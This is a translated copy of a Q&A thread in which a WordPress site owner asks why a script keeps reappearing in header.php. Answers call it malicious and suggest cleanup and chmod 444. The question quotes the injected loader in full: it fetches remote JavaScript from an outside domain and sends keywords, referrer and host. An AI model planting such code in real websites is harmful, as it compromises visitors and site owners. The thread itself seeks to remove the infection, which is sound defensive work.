堆栈内存溢出
  繁体   English   中英

header.php中脚本的来源

[英]The source of a script in header.php

 原文  2016-02-12 19:42:27       javascript/ php/ wordpress

问题描述

我的网站是wordpress网站。 以下代码每隔几个小时出现在Header.php中,当我删除它时,它会在几个小时后再次出现。 请注意,代码“ shiro-maga.com”中的链接每次都会更改。 代码如下: 

 <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

我相信该主题已被感染“扫描显示没有恶意软件”,因此它生成了此脚本。 您能否建议如何找到此脚本的来源?

谢谢

2 个解决方案

解决方案1
 0  2016-02-12 20:05:17

绝对是恶意的。 您的网站已被盗用。 您可以使用下面的详细文章来查找和删除感染源。 http://ottopress.com/2009/hacked-wordpress-backdoors/ 像Windows Grep这样的程序将帮助您快速扫描所有主题文件中的关键字,例如eval和base64。 从主题中删除所有可疑的代码ing,然后更新WordPress核心文件,以确保您运行的是干净版本。 另外,如果您有备份,请还原主题的备份,并使用全新的WP更新版本来更新您的网站。

解决方案2
 0  2016-05-17 10:50:28

防止重新感染的快速解决方案是将CHMOD header.php设置为444 (只读)。 该站点可以正常工作,不会被重新感染,从而使您有时间发现感染。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 将Google Analytics(分析)脚本粘贴到我的网站(head.php,header.php或page-header.php)中吗? header.php中的WordPress,GoogleMaps和JavaScript 将jQuery添加到Header.php文件失败 添加到 header.php 的脚本不会在某些页面上加载,但一旦登录到 wp-dashboard 就会在所有页面上显示 PHP中的“全选”复选框,其中包含header.php 在Wordpress网站的header.php文件中找到未知代码 我的include / header.php中的参考CSS文件 将 Adsense 代码添加到 header.php 后,WordPress css 未加载 如果我的菜单在 header.php 中,如何滚动到 index.php 中的特定位置 在Wordpress中运行的Javascript需要在header.php或functions.php中运行吗?
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM